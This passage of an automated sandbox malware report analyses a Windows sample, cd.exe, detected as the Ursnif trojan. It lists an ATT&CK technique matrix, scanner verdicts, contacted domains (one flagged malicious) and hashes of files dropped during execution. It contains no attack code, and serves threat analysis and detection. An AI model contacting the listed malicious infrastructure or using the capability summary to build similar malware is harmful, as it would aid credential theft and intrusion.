              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00401342 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

              Stealing of Sensitive Information:

              Yara detected Ursnif
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              Remote Access Functionality:

              Yara detected Ursnif
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR
              Source: Yara matchFile source: cd.exe, type: SAMPLE

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Command and Scripting Interpreter 2 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 2 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Service Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 23 | NTDS | System Information Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              cd.exe | 60% | ReversingLabs | Win32.Trojan.Ursnif
              cd.exe | 100% | Joe Sandbox ML |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              1.2.cd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
              1.3.cd.exe.82998c.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

              Domains

              No Antivirus matches

              URLs


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              google.com | 142.250.203.110 | true | false | | high
              menehleibe.com | 173.239.8.164 | true | true | | unknown
              www.google.com | 142.250.102.106 | true | false | | high
              mybetterdl.com | 173.192.101.24 | true | false | | unknown
              gertrk.com | 168.119.139.96 | true | false | | unknown
              p226681.mybetterdl.com | 173.192.101.24 | true | false | | unknown

                          Contacted URLs


URLs from Memory and Binaries


Contacted IPs


General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483177
Start date: 14.09.2021
Start time: 16:01:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: cd.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.spre.troj.evad.winEXE@4/27@6/5
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 46.1% (good quality ratio 43.4%)
                                                                                                                                                                      • Quality average: 71.3%
                                                                                                                                                                      • Quality standard deviation: 30.3%
                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      Warnings:
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 23.203.80.193, 172.217.168.67, 20.54.110.249, 40.112.88.60, 152.199.19.161, 20.50.102.62, 80.67.82.235, 80.67.82.211, 23.211.4.86
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, www.gstatic.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                                                                                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483177/sample/cd.exe

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      No simulations

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs


                                                                                                                                                                      Domains


                                                                                                                                                                      ASN

                                                                                                                                                                      • 207.218.215.108
                                                                                                                                                                      Kp6SDRr8xdGet hashmaliciousBrowse
                                                                                                                                                                      • 173.193.175.220
                                                                                                                                                                      BqfM9JwIC5Get hashmaliciousBrowse
                                                                                                                                                                      • 161.159.29.133
                                                                                                                                                                      O83wubYGMU.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 216.250.97.121
                                                                                                                                                                      OnRFDWqdnFGet hashmaliciousBrowse
                                                                                                                                                                      • 150.239.179.11
                                                                                                                                                                      2vMBHaZcM5Get hashmaliciousBrowse
                                                                                                                                                                      • 174.122.77.118
                                                                                                                                                                      iYUfv1bE48Get hashmaliciousBrowse
                                                                                                                                                                      • 169.62.46.57
                                                                                                                                                                      sora.arm7Get hashmaliciousBrowse
                                                                                                                                                                      • 74.54.2.125
                                                                                                                                                                      OffboardDiagLauncher.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 150.238.42.13

                                                                                                                                                                      JA3 Fingerprints


                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29272
                                                                                                                                                                      Entropy (8bit):1.7680750665735105
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:IwLGcpryGwpL3G/ap8JGIpcaQGvnZpva1GoHRqp9aGGo4zX1pmNGWHz71MGWHBTw:rRZ6Z/27WGt2AfszX1MHPCIifT9cDB
                                                                                                                                                                      MD5:6718428E930008E34240856F43C47A5E
                                                                                                                                                                      SHA1:7D88F1553C8394FB762C236D1AD3B9193D877F84
                                                                                                                                                                      SHA-256:57819E6BE034067D0BA3C30AB272050D20D41CCE457DA3444171DC64E155FCD1
                                                                                                                                                                      SHA-512:D6371F4BD026975901D47B6851D1ED69EB43FB42FF5BD6CE422D4E768337CBD2E41FDA0454D68C4FF37E7D6CBC95F7E57E9AE396AECC06D747E3327A629A6766
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):33596
                                                                                                                                                                      Entropy (8bit):1.7318997073805276
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:rOZRQh6TkMjR29W+MaguzrMg2oyEcdOy8Og:ram8Y+AUXXYQ+//
                                                                                                                                                                      MD5:30628B54E4C2F4AABCD1C1C35E73BA0E
                                                                                                                                                                      SHA1:894C3CABAB8EC9C63069758EE70965C511A5A10C
                                                                                                                                                                      SHA-256:6B8FFAC8A720BD8D337017290A85B5ADEAD8AF2B0FE9B204313462235096CB5A
                                                                                                                                                                      SHA-512:91628C946C5395DB58586ECBF60E0F06BC8B7081475D47F251C5F2B5E5884A820DB7D93BEFBAE2DEF971C873E4BBAF26962FFE7175B6216100756E8E1BCFA6E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.103204027570093
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxOEbTDnWimI002EtM3MHdNMNxOEbTDnWimI00OVbVbkEtMb:2d6NxOOSZHKd6NxOOSZ7V6b
                                                                                                                                                                      MD5:E6C2BC50F8E60C51EFC54CA61B9EC0BA
                                                                                                                                                                      SHA1:3DB36280067C68EA8AF261DD26BA7DE0AE2E85AB
                                                                                                                                                                      SHA-256:930556467F85BEF61075091DE2224E1A60796B1465E63D748BE8959B005C3B94
                                                                                                                                                                      SHA-512:CCD5CE608075AC84E325C5A9ED3F03151ED94FAC7E374156CB287C44D507E8B614087DE473911B2A1BB636B14049F858BECD772A32FC84BCC4CDCA2550CF1B00
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.060030324837212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxe2ktBkB4nWimI002EtM3MHdNMNxe2ktBkB4nWimI00OVbkak6EtMb:2d6NxrKBkB4SZHKd6NxrKBkB4SZ7VAan
                                                                                                                                                                      MD5:E26BA9F3A760091B3183D1F41CDC98C4
                                                                                                                                                                      SHA1:86884579127B6B404F35859BAB1F0BF8E14BC98A
                                                                                                                                                                      SHA-256:EACDDFE80072986877C90B4C34CE72DE4CD1AC4BC0D38CF50A3E88B33CC2AFCD
                                                                                                                                                                      SHA-512:8A38E8DB918BF88B2E75DDF1653698FBD793B41624BEF49326BA00ADF008A41D2F4240FFFB774A4EB1A8950DF4DBDB80BB9320F8FD107D3BB28D6ED3B31B3CE4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):665
                                                                                                                                                                      Entropy (8bit):5.122450678810792
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxvLbTDnWimI002EtM3MHdNMNxvLbTDnWimI00OVbmZEtMb:2d6NxvPSZHKd6NxvPSZ7Vmb
                                                                                                                                                                      MD5:905FFB93378DC31AC2DD0A6F8DC342E7
                                                                                                                                                                      SHA1:2016CCDEAC7206B8B975E165084EB4623FED8DD7
                                                                                                                                                                      SHA-256:2749E37E02157835DB9CF9A1F79BB5F23C03B6E094E33862D71709B83C37ADBB
                                                                                                                                                                      SHA-512:C772F25E3C85A51C4B5D3C70F17E0C50398A099AA57746A4FC1E67485E53556A77680246BC74713F261A76EAC0791D8378878A80A8DBB523EC501649F502DC8F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):650
                                                                                                                                                                      Entropy (8bit):5.118921291916546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxibTDnWimI002EtM3MHdNMNxibTDnWimI00OVbd5EtMb:2d6NxMSZHKd6NxMSZ7VJjb
                                                                                                                                                                      MD5:6460C64D25542D88DAB4FCF81DA71778
                                                                                                                                                                      SHA1:676D82A03B0BF5C5DE83E5BCBBDCDEF506516758
                                                                                                                                                                      SHA-256:A22AA7D82C753E3C188A28FD08D19E4D81002135F2BFEBEB1F1A430BE57C8B1B
                                                                                                                                                                      SHA-512:B4494A57CC1FD186F7FE654BDE6EE5BB180ADD9DDC22C3E197BB9BB6CC5A3EA9CE3530B67C2BB3593CDDA8DA15E8D6D76A1F474A1A64EDDE83761022F6F78717
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.1343683532362645
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxhGwbTDnWimI002EtM3MHdNMNxhGwbTDnWimI00OVb8K075EtMb:2d6NxQySZHKd6NxQySZ7VYKajb
                                                                                                                                                                      MD5:8E92836C2D0581401653E8DE5C6B8738
                                                                                                                                                                      SHA1:CBAC5A797B78F7CB6DA7290A1062FBED2949213F
                                                                                                                                                                      SHA-256:F3FC6551AD678A4DF601F69273B5B5E83EC0F4B786D622B8E2936B1472B8E87A
                                                                                                                                                                      SHA-512:EFD3436C0CCA7BAF708695893047ED47C51281D01B2F7556342864946B671A22B4DABE64A3323EBA92CF8B7DE715560652DFB56B4182493B829144F5BFCA56A7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.107052953253313
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNx0nbTDnWimI002EtM3MHdNMNx0nbTDnWimI00OVbxEtMb:2d6Nx0DSZHKd6Nx0DSZ7Vnb
                                                                                                                                                                      MD5:84068C5AA2D27A5EA37F4986D9B215FC
                                                                                                                                                                      SHA1:885375A31C5CA66B7E30A0286DCED8161425B029
                                                                                                                                                                      SHA-256:A8DB220EA8C9068C18AF2503BC68A61749726B169C158174E476120A33D2EB89
                                                                                                                                                                      SHA-512:36E8EA1D95AF9BAACC43AB50690ABC02FB593B14D68F8287854C4C53FBCD2E8B8566A2219DAE529B62A5999ECE9BB62FA944A38971E7AC25AA481D6F7B46D69F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.143005129532291
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxxbTDnWimI002EtM3MHdNMNxxbTDnWimI00OVb6Kq5EtMb:2d6NxtSZHKd6NxtSZ7Vob
                                                                                                                                                                      MD5:D9A16E4485A714D44DE977C8989D70FB
                                                                                                                                                                      SHA1:5664A30464FDE79285274B3E5884EB222545171E
                                                                                                                                                                      SHA-256:DDCF95ECFE4AF66B5667C2A29DF770EF6489860FAC1FAE1AF83E32618C0BE95D
                                                                                                                                                                      SHA-512:B424B71F4C07942B988626CCF2E322CC45C4EB92DE95833AB9821C15D7AF08173671587FEC1D8B3AD4A15097B2D8FA569C90EE1A5846DEF4F0818F02AA811C36
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662
                                                                                                                                                                      Entropy (8bit):5.119025965656811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxcbTDnWimI002EtM3MHdNMNxcbTDnWimI00OVbVEtMb:2d6NxWSZHKd6NxWSZ7VDb
                                                                                                                                                                      MD5:766F656BF3D12DFEE67986A2D3382BC5
                                                                                                                                                                      SHA1:1E3FFDA3E62935C74FDFD92F70B258CD59400550
                                                                                                                                                                      SHA-256:ED547F3FEA8A4834065CFA3B3BDD68EA8C1E20AB2771C1037C736E21DD00018C
                                                                                                                                                                      SHA-512:E0A76263B06A7F42B84B8B78DE9DAA8DCD0BA8D8C9558093DC14AD8F6DBB741F9EE0826E2728ECEA636265E650559C1E898E7B4A2B53BFB7490D434CAF8BB9BE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.104263951080776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxfnbTDnWimI002EtM3MHdNMNxfnbTDnWimI00OVbe5EtMb:2d6NxrSZHKd6NxrSZ7Vijb
                                                                                                                                                                      MD5:BDC8F6FB552E18FBA0BCDA81A21E7082
                                                                                                                                                                      SHA1:ECB3148F93F0A95BE011235060D0F55A4FB5CA5D
                                                                                                                                                                      SHA-256:E8B01F4687A0C7F9122EA277E75590893B34B36413BCC35B63B23CD62D58E495
                                                                                                                                                                      SHA-512:98D2BE5AF7DBB05B705AF8755CE246DE9F305C962C48C0C44AC271256A9ECBC0A94F1C93D315BA8C103313ECEB947E200FC72E2DC691163C95FF9F59F40AD593
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5736
                                                                                                                                                                      Entropy (8bit):3.203464048321813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dparxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222w:ci
                                                                                                                                                                      MD5:11D51B96EA77F30B330194110BA96BC7
                                                                                                                                                                      SHA1:CEA4D42916C32FC21A2C60620DE8F76A2DBC4426
                                                                                                                                                                      SHA-256:79FC13392629FF36B061CD9BD12D6152B300953BC272F6CEAAAA2A2B25B7A005
                                                                                                                                                                      SHA-512:2FE562F5713C6C01A91DFC3E3A962B1C9F8A15033DE73E39E8E9C0DC17397A07361CCDF5170842B0EDE687AD48289C4F191D07D72A08E30257ABD9FFE71C2A9E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..h.t.t.p.s.:././.g.e.r.t.r.k...c.o.m./.f.a.v.i.c.o.n...i.c.o
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\0V71R0V5.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):219
                                                                                                                                                                      Entropy (8bit):5.23823323380098
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:IskN20EFNjJ8S/7A+KWRIJiYEUFLZxs4bSl02rBsSZ7NE7uR0Lq9DmJS4IoQ5a8G:wRkrQWR0iYBtqWt2aSyuic4ILoP
                                                                                                                                                                      MD5:D4B691CD9D99117B2EA34586D3E7EEB8
                                                                                                                                                                      SHA1:C79F5572F672361BC097676CB5DA9D4AA956C8B9
                                                                                                                                                                      SHA-256:2178EEDD5723A6AC22E94EC59BDCD99229C87F3623753F5E199678242F0E90DE
                                                                                                                                                                      SHA-512:B69C162BFBA1290C98A2CD222F6EFF9DF69CFC3DBA1651381F4068B30DA813E1687387A794E50B51058C2FDA17B217153BA9599E1E19DC567389B7083093C1FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>301 Moved</TITLE></HEAD><BODY>.<H1>301 Moved</H1>.The document has moved.<A HREF="http://www.google.com/">here</A>...</BODY></HTML>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\d4a6d4bd[1].htm
